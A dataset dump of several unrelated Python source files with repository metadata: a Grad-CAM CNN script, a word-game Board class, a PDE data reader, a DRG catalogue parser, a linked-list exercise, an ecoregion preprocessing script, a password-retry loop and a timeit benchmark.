# Fully connected 1 (input is batch_size x height x width after pooling)
self.fc1_input_features = self.conv2_output_channels * self.pool2_output_dim**2
self.fc1_output_features = 256
# Fully connected 2
self.fc2_input_features = self.fc1_output_features
self.fc2_output_features = 200
# Fully Connected 3 (output is number of features)
self.fc3_input_features = self.fc2_output_features
self.fc3_output_features = 168
# Create the layers
self.conv1 = nn.Conv2d(self.conv1_input_channels,
self.conv1_output_channels,
self.conv1_kernel_size,
stride=self.conv1_stride)
self.max_pool1 = nn.MaxPool2d(self.pool1_kernel_size, self.pool1_stride)
self.conv2 = nn.Conv2d(self.conv2_input_channels,
self.conv2_output_channels,
self.conv2_kernel_size,
stride=self.conv2_stride)
self.max_pool2 = nn.MaxPool2d(self.pool2_kernel_size, self.pool2_stride)
self.flatten = Flatten()
self.fc1 = nn.Linear(self.fc1_input_features, self.fc1_output_features)
self.fc2 = nn.Linear(self.fc2_input_features, self.fc2_output_features)
self.fc3 = nn.Linear(self.fc3_input_features, self.fc3_output_features)
self.features = [self.conv1, self.conv2, self.fc1, self.fc2, self.fc3]
def forward(self, x):
# run the tensor through the layers
x = F.relu(self.conv1(x))
x = self.max_pool1(x)
x = F.relu(self.conv2(x))
x = self.max_pool2(x)
x = self.flatten(x)
x = F.relu(self.fc1(x))
x = F.relu(self.fc2(x))
x = self.fc3(x)
return x
def num_flat_features(self, x):
# number of flat features to determine the size of the first fully connected layer
size = x.size()[1:]
num_features = 1
for s in size:
num_features *= s
return num_features
# Define a features attribute
def copy_bw_to_rgb(input_image):
# Converts torch image to RGB from BW and copies to cpu
# Create a cpu copy of the input called img for plotting
from copy import deepcopy
img = deepcopy(input_image).cpu().numpy()
# Reshape
img = np.squeeze(img)
# copy to RGB
img = np.stack((img,)*3, axis=-1)
return img
if __name__ == '__main__':
""" python grad_cam.py <path_to_image>
1. Loads an image with opencv.
2. Preprocesses it for VGG19 and converts to a pytorch variable.
3. Makes a forward pass to find the category index with the highest score,
and computes intermediate activations.
Makes the visualization. """
args = get_args()
# Import model
model = torch.load(args.model)
# Import label
with open(args.label, 'rb') as f:
label = np.asscalar(pickle.load(f).cpu().numpy())
# Can work with any model, but it assumes that the model has a
# feature method, and a classifier method,
# as in the VGG models in torchvision.
grad_cam = GradCam(model=model, \
target_layer_names=['conv1', 'conv2'], use_cuda=args.use_cuda)
# img = cv2.imread(args.image_path, 1)
# img = np.float32(cv2.resize(img, (224, 224))) / 255
# input = preprocess_image(img)
## Use my own input image
with open(args.image_path, 'rb') as f:
input = torch.Tensor(pickle.load(f)).to(torch.device('cuda:0'))
# prepare input
input = input.reshape((1,1,136,136))
# post process input to image
img = copy_bw_to_rgb(input)
# Turn on gradient tracking for input
input = input.requires_grad_(True)
# If None, returns the map for the highest scoring category.
# Otherwise, targets the requested index.
target_index = label
mask, pred_index = grad_cam(input, target_index)
show_cam_on_image(img, mask, pred_index, args.prefix)
gb_model = GuidedBackpropReLUModel(model=model, use_cuda=args.use_cuda)
gb = gb_model(input, index=target_index)
gb = gb.transpose((1, 2, 0))
cam_mask = cv2.merge([mask, mask, mask])
cam_gb = deprocess_image(cam_mask*gb)
gb = deprocess_image(gb)
cv2.imwrite(f'{args.prefix}_{pred_index}_gb.jpg', gb)
cv2.imwrite(f'{args.prefix}_{pred_index}_cam_gb.jpg', cam_gb) | true |
b6e99339bac4a56aeb175a5dabe3b009751c5abd | Python | infantinoalex/AI-Final-Project | /Source/Board.py | UTF-8 | 12,169 | 3.6875 | 4 | [] | no_license | """
Contains the Board class
The Board is the place where all the tiles are played; it starts off empty, and
then holds every word which gets played throughout the game
"""
import numpy as np
from Tile import Tile
from Anchor import Anchor
from Word import Word
from Words import Words
class Board :
def __init__(self) :
self.size = 21
self.board = np.empty([self.size, self.size], dtype=Tile)
self.anchors = [Anchor()]
for i in range(self.size) :
for j in range(self.size) :
self.board[i, j] = Tile()
def GetBoard(self) :
return self.board
def GetAnchors(self) :
return self.anchors
def PlaceTile(self, tile, hand, xPos, yPos, playDirection) :
tileLetter = tile.GetLetter()
boardPositionLetter = self.board[xPos, yPos].GetLetter()
if not boardPositionLetter == tileLetter :
hand.RemoveTileFromHand(tile)
self.board[xPos, yPos] = tile
def PlaceWord(self, word, anchor, hand, anchorIndex, playDirection) :
relativeXPos = anchor.GetXPos()
relativeYPos = anchor.GetYPos()
if playDirection == 'across' :
relativeXPos-= anchorIndex
for i, tile in enumerate(word.GetTiles()) :
self.PlaceTile(tile, hand, relativeXPos, relativeYPos, 'down')
if i is not anchorIndex :
self.anchors.append(Anchor(tile, relativeXPos, relativeYPos, 'down'))
relativeXPos+= 1
if playDirection == 'down' :
relativeYPos-= anchorIndex
for i, tile in enumerate(word.GetTiles()) :
self.PlaceTile(tile, hand, relativeXPos, relativeYPos, 'across')
if i is not anchorIndex :
self.anchors.append(Anchor(tile, relativeXPos, relativeYPos, 'across'))
relativeYPos+= 1
self.anchors.remove(anchor)
self.ValidateAnchors()
def IsWordLegal(self, word, anchor, anchorIndex, playDirection) :
# word must have at least 2 letters
if not self.BigEnough(word) :
return [False, 'word not big enough']
# word must not go off the board
elif self.OffBoard(word, anchor, anchorIndex, playDirection) :
return [False, 'word goes off the board']
# at this point, if the anchor is the default anchor,
# we can stop checking and confirm that the word is legal
elif anchor.GetLetter() is ' ' :
return [True, 'word with default anchor is legal :)']
# otherwise we have more checks to make
else :
# anchor must mach the letter at the anchor index
if not self.AnchorIndexCorrect(word, anchor, anchorIndex) :
return [False, 'anchorIndex is invalid']
# the word must fit on the board correctly, aka spaces where word will go
# must either be blank or equal to the letter that will be placed there
elif not self.WordFits(word, anchor, anchorIndex, playDirection) :
return [False, 'word does not fit in the board correctly']
# the word must not create any illegal words, aka the spaces surrounding the
# word must be clear or if there are any collisions they must form words
elif self.WordCreatesInvalidWord(word, anchor, anchorIndex, playDirection) :
return [False, 'word creates an invalid word when placed']
else : return [True, 'word is legal :)']
def PrintBoard(self) :
for i in range(21) :
if (i == 0) :
print(end=" ")
for j in range(21) :
print('+---', end="")
print('+')
for j in range(21) :
print(' |', self.board[j][i].GetLetter(), end="")
print(' |')
print(end=" ")
for j in range(21) :
print('+---', end="")
print('+')
def BigEnough(self, word) :
if not word.GetTiles() :
return False
elif len(word.GetTiles()) < 2 :
return False
else :
return True
def OutOfBounds(self, bound) :
if bound < 0 or bound > self.size - 1:
return True
else :
return False
def OffBoard(self, word, anchor, anchorIndex, playDirection) :
relativeXPos = anchor.GetXPos()
relativeYPos = anchor.GetYPos()
if playDirection == 'across' :
upperBound = relativeXPos - anchorIndex
lowerBound = relativeXPos + (len(word.GetTiles()) - anchorIndex - 1)
if playDirection == 'down' :
upperBound = relativeYPos - anchorIndex
lowerBound = relativeYPos + (len(word.GetTiles()) - anchorIndex - 1)
if self.OutOfBounds(upperBound) or self.OutOfBounds(lowerBound) :
return True
else :
return False
def AnchorIndexCorrect(self, word, anchor, anchorIndex) :
expectedAnchorLetter = anchor.GetLetter()
actualAnchorLetter = word.GetTiles()[anchorIndex].GetLetter()
if expectedAnchorLetter is actualAnchorLetter :
return True
else :
return False
def TileFits(self, tile, xPos, yPos) :
if self.board[xPos, yPos].GetLetter() == ' ' :
return True
elif self.board[xPos, yPos].GetLetter() == tile.GetLetter() :
return True
else :
return False
def WordFits(self, word, anchor, anchorIndex, playDirection) :
relativeXPos = anchor.GetXPos()
relativeYPos = anchor.GetYPos()
if playDirection == 'across' :
upperBound = relativeXPos - anchorIndex
lowerBound = relativeXPos + (len(word.GetTiles()) - anchorIndex - 1)
for i in range(upperBound, lowerBound + 1) :
if not self.TileFits(word.GetTiles()[i - upperBound], i, relativeYPos) :
return False
if playDirection == 'down' :
upperBound = relativeYPos - anchorIndex
lowerBound = relativeYPos + (len(word.GetTiles()) - anchorIndex - 1)
for i in range(upperBound, lowerBound + 1) :
if not self.TileFits(word.GetTiles()[i - upperBound], relativeXPos, i) :
return False
return True
def PrefixAndSuffixClear(self, word, anchor, anchorIndex, playDirection) :
# look at the word you played in addition to any direct prefex and suffix tiles
# if this new word is valid, return true, otherwise return false
relativeXPos = anchor.GetXPos()
relativeYPos = anchor.GetYPos()
if playDirection == 'across' :
upperBound = relativeXPos - anchorIndex
prefixUpperBound = upperBound - 1
upperOutOfBounds = self.OutOfBounds(prefixUpperBound)
if upperOutOfBounds : upperEqualsSpace = False
else : upperEqualsSpace = self.board[prefixUpperBound, relativeYPos].GetLetter() == ' '
lowerBound = relativeXPos + (len(word.GetTiles()) - anchorIndex - 1)
suffixLowerBound = lowerBound + 1
lowerOutOfBounds = self.OutOfBounds(suffixLowerBound)
if lowerOutOfBounds : lowerOutOfBounds = False
else : lowerEqualsSpace = self.board[suffixLowerBound, relativeYPos].GetLetter() == ' '
if not upperOutOfBounds and upperEqualsSpace and not lowerOutOfBounds and lowerEqualsSpace :
return True
while not upperOutOfBounds and not upperEqualsSpace :
prefixUpperBound-= 1
upperOutOfBounds = self.OutOfBounds(prefixUpperBound)
if upperOutOfBounds : upperEqualsSpace = False
else : upperEqualsSpace = self.board[prefixUpperBound, relativeYPos].GetLetter() == ' '
while not lowerOutOfBounds and not lowerEqualsSpace :
suffixLowerBound+= 1
lowerOutOfBounds = self.OutOfBounds(suffixLowerBound)
if lowerOutOfBounds : lowerOutOfBounds = False
else : lowerEqualsSpace = self.board[suffixLowerBound, relativeYPos].GetLetter() == ' '
fullWord = []
for i in range(prefixUpperBound + 1, upperBound) :
fullWord.append(self.board[i, relativeYPos])
fullWord+= word.GetTiles()
for i in range(lowerBound + 1, suffixLowerBound) :
fullWord.append(self.board[i, relativeYPos])
return Words().ExactWordSearch(Word(fullWord))
if playDirection == 'down' :
upperBound = relativeYPos - anchorIndex
prefixUpperBound = upperBound - 1
upperOutOfBounds = self.OutOfBounds(prefixUpperBound)
if upperOutOfBounds : upperEqualsSpace = False
else : upperEqualsSpace = self.board[relativeXPos, prefixUpperBound].GetLetter() == ' '
lowerBound = relativeYPos + (len(word.GetTiles()) - anchorIndex - 1)
suffixLowerBound = lowerBound + 1
lowerOutOfBounds = self.OutOfBounds(suffixLowerBound)
if lowerOutOfBounds : lowerEqualsSpace = False
else : lowerEqualsSpace = self.board[relativeXPos, suffixLowerBound].GetLetter() == ' '
if not upperOutOfBounds and upperEqualsSpace and not lowerOutOfBounds and lowerEqualsSpace :
return True
while not upperOutOfBounds and not upperEqualsSpace :
prefixUpperBound-= 1
upperOutOfBounds = self.OutOfBounds(prefixUpperBound)
if upperOutOfBounds : upperEqualsSpace = False
else : upperEqualsSpace = self.board[relativeXPos, prefixUpperBound].GetLetter() == ' '
while not lowerOutOfBounds and not lowerEqualsSpace :
suffixLowerBound+= 1
lowerOutOfBounds = self.OutOfBounds(suffixLowerBound)
if lowerOutOfBounds : lowerEqualsSpace = False
else : lowerEqualsSpace = self.board[relativeXPos, suffixLowerBound].GetLetter() == ' '
fullWord = []
for i in range(prefixUpperBound + 1, upperBound) :
fullWord.append(self.board[relativeXPos, i])
fullWord+= word.GetTiles()
for i in range(lowerBound + 1, suffixLowerBound) :
fullWord.append(self.board[relativeXPos, i])
return Words().ExactWordSearch(Word(fullWord))
def WordCreatesInvalidWord(self, word, anchor, anchorIndex, playDirection) :
invalidWord = False
if not self.PrefixAndSuffixClear(word, anchor, anchorIndex, playDirection) :
invalidWord = True
for i in range(len(word.GetTiles())) :
tile = word.GetTiles()[i]
temp = Word([tile])
if i is not anchorIndex and playDirection is 'across':
x = anchor.GetXPos() - anchorIndex + i
y = anchor.GetYPos()
if not self.PrefixAndSuffixClear(temp, Anchor(tile, x, y), 0, 'down') :
invalidWord = True
if i is not anchorIndex and playDirection is 'down':
x = anchor.GetXPos()
y = anchor.GetYPos() - anchorIndex + i
if not self.PrefixAndSuffixClear(temp, Anchor(tile, x, y), 0, 'across') :
invalidWord = True
return invalidWord
def ValidateAnchors(self):
badAnchors = []
for anchor in self.anchors:
xPos = anchor.GetXPos()
yPos = anchor.GetYPos()
if anchor.GetDirection() == 'across':
if self.board[anchor.xPos+1, yPos].GetLetter() != ' ' or self.board[xPos-1, yPos].GetLetter() != ' ':
badAnchors.append(anchor)
elif anchor.GetDirection() == 'down':
if self.board[xPos, yPos+1].GetLetter() != ' ' or self.board[xPos, yPos-1].GetLetter() != ' ':
badAnchors.append(anchor)
for anchor in badAnchors:
self.anchors.remove(anchor) | true |
3c4b3a6199e925be395044e989719eeb826cfbe7 | Python | jbernrd2/Talbot_Effect | /Data_Reader.py | UTF-8 | 1,346 | 3.828125 | 4 | [] | no_license | ###################### Code for opening Data files ############################
# This code takes a data file from a PDE solution, and returns the real and
# imaginary parts of the solution, as well as the position that each of these
# data points as an array
###############################################################################
# data: The data file that you wish to access
# index: 0 or 'real' for real part of solution
# 1 or 'imag' for imaginary part of solution
# 2 or 'x' for x position
def listReturn(data,index):
# Check the type of inputs
if type(index) == str:
index = index.upper()
if index == 'REAL':
index = 0
elif index == 'IMAG':
index = 1
elif index == 'X':
index = 2
else:
print('Invalid argument for input: index')
return 0
elif type(index) == int:
if index < 0 and index > 2:
print('Invalid argume for input: index')
output = []
with open(data) as f:
file = f.readlines()
for i in file:
line = i.strip().split(',')
if len(line) != 1:
output.append(float(line[index]))
return output
import numpy as np
import matplotlib.pyplot as plt
#plt.plot(listReturn('LinSch_at_t_0.3x.txt','Real'))
| true |
8510d003d5da6cf2e4b8f9bfa3b473ce59f14ade | Python | josefondrej/medical-ide-poc | /dev_utils/parse_drg_catalogue.py | UTF-8 | 477 | 2.640625 | 3 | [
"MIT"
] | permissive | from pandas import read_excel, set_option
set_option("display.max_columns", 20)
set_option("display.width", 500)
catalogue_path = "SwissDRG-Version_10_0_Fallpauschalenkatalog_AV_2021_2021.xlsx"
df = read_excel(catalogue_path, sheet_name="Akutspitäler", skiprows=7)
df = df.iloc[:, [0, 2]]
df.columns = ["code", "text"]
df.set_index("code", inplace=True)
code_to_text = df["text"].to_dict()
code_text = [[key, value] for key, value in code_to_text.items()]
print(code_text)
| true |
9217807182adfd5967309c87f53a346b0507e5bc | Python | adamafriansyahb/algorithm-practice | /reverse_linkedlist.py | UTF-8 | 341 | 3.5 | 4 | [] | no_license | # HackerRank Challange: Reverse a Linked List - Problem Solving -> Data Structures
def reverse_llist(head):
current = head
prev = None
after = current.next
while current:
after = current.next
current.next = None
prev = current
current = after
# Prev is returned as head
return prev
| true |
34cd3c1d2627721f196af0996e2691d4fd7916fe | Python | sreisig/math561-final | /preprocess.py | UTF-8 | 765 | 2.796875 | 3 | [] | no_license | import pandas as pd
def extract_eco1_windspeed_fuelmoisture():
"""
Extracts average windspeed and fuel moisture by level 1 ecoregion (data originally segmented by level 3 ecoregion)
Assumes that fm_ws_monthly_ecn.csv has been moved from Nagy's repo into data/
"""
df = pd.read_csv('./data/fm_ws_monthly_ecn.csv')
df['NA_L1CODE'] = df['NA_L3CODE'].str.split('.').map(lambda x:x[0])
l1_ecoregion_vals = df.groupby('NA_L1CODE').mean()
return l1_ecoregion_vals
def save_eco1_windspeed_fuelmoisture():
"""
Saves avg windspeed, fuelmoisture to file
"""
df = extract_eco1_windspeed_fuelmoisture()
df.to_csv('./data/l1_windspeed_fuelmoisture.csv')
if __name__ == "__main__":
save_eco1_windspeed_fuelmoisture()
| true |
588f8643e171d9c40bbbd739dd83af738d1da71f | Python | Reinelin/password_retry | /password.py | UTF-8 | 264 | 3.46875 | 3 | [] | no_license | password = 'a123456'
i = 3
while i > 0:
i = i - 1
pwd = input('please enter password:')
if pwd == 'a123456':
print('succesful login')
break
else:
print('wrong password')
if i > 0:
print( i ,'more chance')
else:
print('no more chance')
| true |
369e29adcf464645f572777948d926e61a5055c5 | Python | jatinmayekar/Kalman_Filter | /s_3_e2_time.py | UTF-8 | 804 | 3.546875 | 4 | [
"MIT"
] | permissive | # importing the required module
import timeit
# code snippet to be executed only once
mysetup = "from math import sqrt"
# code snippet whose execution time is to be measured
mycode = '''
def solution(ranks):
# write your code in Python 3.6
count = 0 #initialize counter for num of soldiers who can report to some superior
n = sorted(ranks) #order the list example : 0 1 3 3 4 4
for i in n: #take each item from the sorted list
if i+1 in n: #check if a higher number which is one greater than i exists
count += 1 #if true increment counter
print(count)
return count
#solution([4,4,3,3,1,0])
li = list(range(1,100))
solution(li)
#solution([3, 4, 3, 0, 2, 2, 3, 0, 0])
'''
# timeit statement
print (timeit.timeit(setup = mysetup,
stmt = mycode,
number = 10000) )
| true |